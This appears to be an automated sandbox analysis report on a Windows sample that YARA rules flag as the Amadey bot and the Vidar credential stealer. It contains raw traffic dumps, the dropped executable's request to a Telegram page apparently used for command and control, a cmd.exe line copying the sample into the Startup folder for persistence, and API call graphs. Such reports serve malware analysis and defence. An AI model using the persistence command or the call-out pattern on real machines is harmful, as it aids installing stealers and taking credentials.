b8 4b c6 6e ec cc 9e 12 2f df aa 3f f9 29 2a
                                                                              Data Ascii: L/-e9L5]XKt1GxKWi^,>PXI-:Lp7k[wxv)\KcQ7=DY.qe:_70O!i\c:P?yVSv`-1j^jIMz5,0r{KBo9G;_1Kn/?)*
                                                                              2022-06-01 23:53:56 UTC1809INData Raw: 45 eb e4 aa d5 a6 61 0b 7a 51 f2 53 a9 49 6a 56 27 d1 93 9a cb 25 dd b3 87 2c 78 b7 86 40 0e 8f 73 69 5b c8 0c c8 de ab e4 90 38 0f e0 5c cf 9d ec 7e b0 f2 37 82 94 cb 93 31 05 3f 9b 2a 1a 5b 6c 66 5d 59 4a 32 47 ab b7 b1 92 be 99 09 d3 0f d2 3f be 40 2f 0a ab dc cc 8a 75 9a 35 b3 74 42 40 72 d6 f1 5a 97 35 4d 8b f2 5d 80 5d ca 3a a2 e8 20 de 73 5d bc 29 bb f1 e9 87 2b c9 bb 20 53 9f bd ed 84 14 dc c8 3f 58 d1 67 39 cf 8f 2f 6e c9 73 c5 f5 fa df 59 4c 68 5f 6e f8 be 15 b2 8f d1 f1 ad c7 9f b7 8d 97 ff 49 42 f0 64 a9 40 a3 47 22 09 cb ee 79 8e 74 63 42 a8 b7 44 fd 69 7d 4d 85 b3 a2 4b 7c 8a cf ed ca 01 59 7a a4 47 f3 27 42 ee 36 74 bc 59 30 87 55 e5 04 ed 23 a1 bd 49 d3 c3 16 8b e6 dc a2 10 fb e1 1b c3 71 c9 73 88 31 e7 02 9c 11 b5 21 fe 88 5f 94 ad 35 18
                                                                              Data Ascii: EazQSIjV'%,x@si[8\~71?*[lf]YJ2G?@/u5tB@rZ5M]]: s])+ S?Xg9/nsYLh_nIBd@G"ytcBDi}MK|YzG'B6tY0U#Iqs1!_5
                                                                              2022-06-01 23:53:56 UTC1813INData Raw: 0c f7 4a cb 5c 20 39 64 a5 93 e7 ac 36 b4 02 dd 16 3a 21 98 e5 a6 8d fa 29 b4 41 3d f9 c5 68 84 ce 64 be 82 93 72 0a 38 12 3a ec 68 bc 6b 43 cd 28 be 58 24 cf 6d aa ac 44 28 20 52 f4 3e af f4 b2 a8 85 28 63 b6 7e 65 65 63 4a 2c c3 f2 b4 c0 80 72 7d e6 3e d7 24 cf f1 14 16 36 38 ec 4e 9b e6 55 2c 7f 15 d4 09 a7 eb 67 30 58 4b 02 20 de 8c be bf 28 97 e5 48 fa 1b 9f 44 a0 aa 1e 80 06 95 1d ac 95 25 1e ac 5e 47 4e 47 87 5d 2a 5c df 2e bb 1e 04 e4 65 cb ef e9 f7 aa 64 b8 98 c4 ac 46 a3 92 36 8d e4 70 86 09 74 ce 3c e0 59 93 20 49 17 a6 9a fc ba 0e 79 19 75 49 bd fd 06 46 40 78 5b fe 0f 8b 95 6e 06 05 ac 0a 55 54 a0 28 18 25 8d b5 6d 44 0b 08 73 0d b8 32 c6 00 03 9c 77 ab 63 b9 4b 6b 42 9f 1b 53 ec 8a d4 8a 61 21 70 3b c8 a7 28 57 b1 9f 2d cd 19 a5 ab 2f f9 83
                                                                              Data Ascii: J\ 9d6:!)A=hdr8:hkC(X$mD( R>(c~eecJ,r}>$68NU,g0XK (HD%^GNG]*\.edF6pt<Y IyuIF@x[nUT(%mDs2wcKkBSa!p;(W-/
                                                                              2022-06-01 23:53:56 UTC1817INData Raw: 8c cf 11 73 37 2b 38 ca 20 05 35 22 63 f7 ba 39 06 a9 1e 1d d2 e0 47 2f 88 c6 05 ff 99 06 69 62 7b 6b ae e3 d9 87 75 f9 a3 5d 78 aa 19 d0 2c 29 71 40 76 4e ec 13 65 90 e3 3b 6b 97 5a e3 63 e1 58 ff 4d 3a 4f 75 d6 82 50 2d a1 6e b6 21 3e 87 d6 da b2 1d 70 cc 9e e0 00 a9 55 13 a9 91 61 a7 98 0e 1d ea c0 dc 7f f3 37 9d 45 21 2d 84 18 55 c0 97 36 ff 69 9c d8 29 2c e7 7a 4f e8 02 36 0f f9 df 16 c2 b4 27 57 03 9f 4d 13 d7 d0 8f 07 33 19 97 96 5c 24 45 02 c6 b2 bc 52 ae eb 7d 91 98 4b c7 54 02 bc 54 2c 10 f3 e8 84 40 99 cc d5 d1 4b 98 51 bc 8a 95 27 38 1a 55 ac 67 af d5 89 55 16 65 31 8d 08 11 eb 1a d5 32 08 85 f5 30 f6 11 16 71 96 23 ea 54 f8 a8 b3 04 2a 17 64 8a 8f 7c a7 ff cc 95 39 23 bd fc 16 d0 98 3b b8 0c e1 6a 15 86 2b 8f e6 04 62 a1 30 c7 ba be ea 56 36
                                                                              Data Ascii: s7+8 5"c9G/ib{ku]x,)q@vNe;kZcXM:OuP-n!>pUa7E!-U6i),zO6'WM3\$ER}KTT,@KQ'8UgUe120q#T*d|9#;j+b0V6
                                                                              2022-06-01 23:53:56 UTC1821INData Raw: f8 61 f8 64 f8 5d f8 41 f8 66 f8 5e f8 67 f8 f8 f8 f8 f8 1c f8 fc f8 f8 f8 4c f8 6a f8 59 f8 66 f8 6b f8 64 f8 59 f8 6c f8 61 f8 67 f8 66 f8 f8 f8 f8 f8 f8 f8 a8 fc 90 f9 f8 f8 f9 f8 4b f8 6c f8 6a f8 61 f8 66 f8 5f f8 3e f8 61 f8 64 f8 5d f8 41 f8 66 f8 5e f8 67 f8 f8 f8 6c f9 f8 f8 f9 f8 28 f8 28 f8 28 f8 28 f8 28 f8 2c f8 5a f8 28 f8 f8 f8 26 f8 fb f8 f9 f8 3e f8 61 f8 64 f8 5d f8 3c f8 5d f8 6b f8 5b f8 6a f8 61 f8 68 f8 6c f8 61 f8 67 f8 66 f8 f8 f8 f8 f8 45 f8 65 f8 f8 f8 f8 f8 28 f8 00 f8 f9 f8 3e f8 61 f8 64 f8 5d f8 4e f8 5d f8 6a f8 6b f8 61 f8 67 f8 66 f8 f8 f8 f8 f8 28 f8 26 f8 28 f8 26 f8 28 f8 26 f8 28 f8 f8 f8 26 f8 ff f8 f9 f8 41 f8 66 f8 6c f8 5d f8 6a f8 66 f8 59 f8 64 f8 46 f8 59 f8 65 f8 5d f8 f8 f8 45 f8 65 f8 26 f8 5c f8 64 f8 64 f8
                                                                              Data Ascii: ad]Af^gLjYfkdYlagfKljaf_>ad]Af^gl(((((,Z(&>ad]<]k[jahlagfEe(>ad]N]jkagf(&(&(&(&Afl]jfYdFYe]Ee&\dd


                                                                              Session ID:4
                                                                              Source IP:192.168.2.4
                                                                              Source Port:49893
                                                                              Destination IP:149.154.167.99
                                                                              Destination Port:443
                                                                              Process:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              2022-06-01 23:55:03 UTC | 1823 | OUT | GET /hyipsdigest HTTP/1.1
                                                                              Host: t.me
                                                                              2022-06-01 23:55:03 UTC | 1823 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0
                                                                              Date: Wed, 01 Jun 2022 23:55:03 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 9550
                                                                              Connection: close
                                                                              Set-Cookie: stel_ssid=d3788638d5a725bfd9_16547912055225973096; expires=Thu, 02 Jun 2022 23:55:03 GMT; path=/; samesite=None; secure; HttpOnly
                                                                              Pragma: no-cache
                                                                              Cache-control: no-store
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Strict-Transport-Security: max-age=35768000
                                                                              2022-06-01 23:55:03 UTC | 1823 | IN | Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @hyipsdigest</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta property="og:title" content="hyipsdigest"><meta property="o


                                                                              Target ID:0
                                                                              Start time:01:53:10
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\0XzeMRyE1e.exe"
                                                                              Imagebase:0x430000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.304714151.00000000038E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.304438812.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:7
                                                                              Start time:01:53:35
                                                                              Start date:02/06/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Imagebase:0x1190000
                                                                              File size:232960 bytes
                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:9
                                                                              Start time:01:53:35
                                                                              Start date:02/06/2022
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff647620000
                                                                              File size:625664 bytes
                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:13
                                                                              Start time:01:53:37
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              Imagebase:0x730000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.297328127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000D.00000002.509327209.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.297012501.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.297993212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.297659773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000000.298902181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000D.00000002.509308584.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000D.00000002.508065296.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:16
                                                                              Start time:01:53:48
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe"
                                                                              Imagebase:0x440000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000010.00000002.446415275.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000010.00000002.446348077.00000000037A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 14%, Metadefender
                                                                              • Detection: 65%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:17
                                                                              Start time:01:53:54
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                                                                              Imagebase:0xc60000
                                                                              File size:1472680 bytes
                                                                              MD5 hash:FE87E3591C90ECCD54C558FB487E262E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MALWARE_Win_Vidar, Description: Detects Vidar / ArkeiStealer, Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000011.00000002.511834005.0000000001477000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 20%, Metadefender
                                                                              • Detection: 65%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:18
                                                                              Start time:01:54:08
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                                                                              Imagebase:0xc60000
                                                                              File size:1472680 bytes
                                                                              MD5 hash:FE87E3591C90ECCD54C558FB487E262E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:20
                                                                              Start time:01:54:17
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                                                                              Imagebase:0xc60000
                                                                              File size:1472680 bytes
                                                                              MD5 hash:FE87E3591C90ECCD54C558FB487E262E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              Target ID:21
                                                                              Start time:01:54:28
                                                                              Start date:02/06/2022
                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                                                                              Imagebase:0xd80000
                                                                              File size:26112 bytes
                                                                              MD5 hash:4A2AC1E629644BE2B37F29F21998C8D3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.410768530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.428197655.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.428611473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.427877581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.426514093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000002.430278226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000015.00000000.418537482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                                Execution Graph

                                                                                Execution Coverage:11.6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:194
                                                                                Total number of Limit Nodes:10

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B710
                                                                                • GetCurrentThread.KERNEL32 ref: 00C9B74D
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B78A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9B7E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: f033bbd8b4b2737257459aadf85d17df6e999d4382afbe0b62caeaca841d8dde
                                                                                • Instruction ID: 06efbe072ccc662125b4b26622ba168b1bc74fca20199998d63cb88ce351468e
                                                                                • Opcode Fuzzy Hash: f033bbd8b4b2737257459aadf85d17df6e999d4382afbe0b62caeaca841d8dde
                                                                                • Instruction Fuzzy Hash: D16169B0D002899FCB44CFA9D6887EEBBF1EF48304F2585AAE019B7351DB755948CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B710
                                                                                • GetCurrentThread.KERNEL32 ref: 00C9B74D
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B78A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9B7E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 544c2a384a02b0c84e17415edd126e84d9e3f3d40facb8940ada3fc59b99a6c3
                                                                                • Instruction ID: 55ea606471eec4c051633ed98c8e836442089fabe514d0b3712d5e01fcb1bf0a
                                                                                • Opcode Fuzzy Hash: 544c2a384a02b0c84e17415edd126e84d9e3f3d40facb8940ada3fc59b99a6c3
                                                                                • Instruction Fuzzy Hash: F25156B0D003899FDB10CFA9D68879EBBF0AF88314F15855AE419B7350C7755948CB72
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B710
                                                                                • GetCurrentThread.KERNEL32 ref: 00C9B74D
                                                                                • GetCurrentProcess.KERNEL32 ref: 00C9B78A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00C9B7E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 06258ff33d2cf818cf9852a7a92832196a0cb4f06b1fc4483377d6dad78e9440
                                                                                • Instruction ID: 69e98c9d571025363bef704e761c1fc9f61a5dbdb8d845fd54e52da864af78f0
                                                                                • Opcode Fuzzy Hash: 06258ff33d2cf818cf9852a7a92832196a0cb4f06b1fc4483377d6dad78e9440
                                                                                • Instruction Fuzzy Hash: 875146B0D006899FDB10CFA9D68879EBBF0EF88314F25C559E419B7350C7755948CB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C998F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 3722e2fdbe0deb523f0094c8b40e53e413831ac22d91e371181373a92a82a9c2
                                                                                • Instruction ID: eead101370c4133c378f5b34be7c5e557da1e743c4695e1f4f3fe8f8582ccc57
                                                                                • Opcode Fuzzy Hash: 3722e2fdbe0deb523f0094c8b40e53e413831ac22d91e371181373a92a82a9c2
                                                                                • Instruction Fuzzy Hash: 46712470A00B058FDB24DF6AC4497AAB7F1FF88304F00892EE55AD7A50DB75E909CB95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C9FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 2a80a68ee2210977a9a50a5ae2f4e0490cc2153394ca9a8bb62171682813ac91
                                                                                • Instruction ID: 834f6de3bb9cae9771207b344417b3963245eb16cfbae9954e4e825e28a7e947
                                                                                • Opcode Fuzzy Hash: 2a80a68ee2210977a9a50a5ae2f4e0490cc2153394ca9a8bb62171682813ac91
                                                                                • Instruction Fuzzy Hash: 2E51CFB1D003499FDF14CF99D884ADEBBB5BF48314F24812EE819AB250D7709946CF91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00C9FE0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: d37c319a80ee0aa9a6b7117bf4409a75c80201dfb3f04fbd1684240a625dbfb3
                                                                                • Instruction ID: 4ddab540fedf68ca6dffd645313ebcb26a1a836b0d9e965300306da95ebc650f
                                                                                • Opcode Fuzzy Hash: d37c319a80ee0aa9a6b7117bf4409a75c80201dfb3f04fbd1684240a625dbfb3
                                                                                • Instruction Fuzzy Hash: 2541BEB1D003499FDF14CF99C884ADEBBB5BF88314F24812AE819AB250D774A985CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C95429
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 01e4fd16b6993c4ab0c06ad06eea5f4ac66905d8216b68c343a7e6d4500a3f1b
                                                                                • Instruction ID: 452cdc0d00aec30e081be15851b8f17687011a4056a8248913baf41133bd312e
                                                                                • Opcode Fuzzy Hash: 01e4fd16b6993c4ab0c06ad06eea5f4ac66905d8216b68c343a7e6d4500a3f1b
                                                                                • Instruction Fuzzy Hash: 1D4103B0C0466CCEDF25CFA9C884BDEBBB5BF48304F118069D509AB251DB756945CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c93e08; API call: CreateActCtxA]
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 00C95429
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c992e0; API call: LoadLibraryExW]
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c9b8d0; API call: DuplicateHandle]
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C9B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c9b8d8; API call: DuplicateHandle]
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C9B95F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
